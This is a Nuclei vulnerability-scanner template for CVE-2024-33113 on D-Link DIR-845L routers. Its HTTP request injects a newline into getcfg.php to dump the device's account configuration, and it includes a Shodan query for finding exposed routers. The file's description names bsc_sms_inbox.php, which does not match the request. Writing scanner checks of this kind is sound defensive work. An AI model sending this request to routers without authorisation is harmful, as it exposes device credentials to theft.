nuclei-templates/http/cves/2024/CVE-2024-33113.yaml

42 lines
1.2 KiB
YAML

id: CVE-2024-33113
info:
name: D-LINK DIR-845L bsc_sms_inbox.php file - Information Disclosure
author: pussycat0x
severity: medium
description: |
D-LINK DIR-845L <=v1.01KRb03 is vulnerable to Information disclosurey via bsc_sms_inbox.php.
reference:
- https://github.com/FaLLenSKiLL1/CVE-2024-33113
- https://github.com/yj94/Yj_learning/blob/main/Week16/D-LINK-POC.md
classification:
epss-score: 0.00043
epss-percentile: 0.0866
cpe: cpe:2.3:h:dlink:dir-845l:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: "DIR-845L"
product: dir-845l
vendor: dlink
tags: cve,cve2024,dlink,info-leak
http:
- method: GET
path:
- "{{BaseURL}}/getcfg.php?a=%0A_POST_SERVICES=DEVICE.ACCOUNT%0AAUTHORIZED_GROUP=1"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<service>DEVICE.ACCOUNT</service>"
- "<seqno>"
condition: and
- type: status
status:
- 200
# digest: 4b0a00483046022100ec87c2ac5ca4f20e03f4124ceff0813f7c2781c40386a2e175833a94317fecfc0221008e60c37e890f1d57fc8e3ecaf060276b1800e9eefe727ed8c6713f027166613d:922c64590222798bb761d5b6d8e72950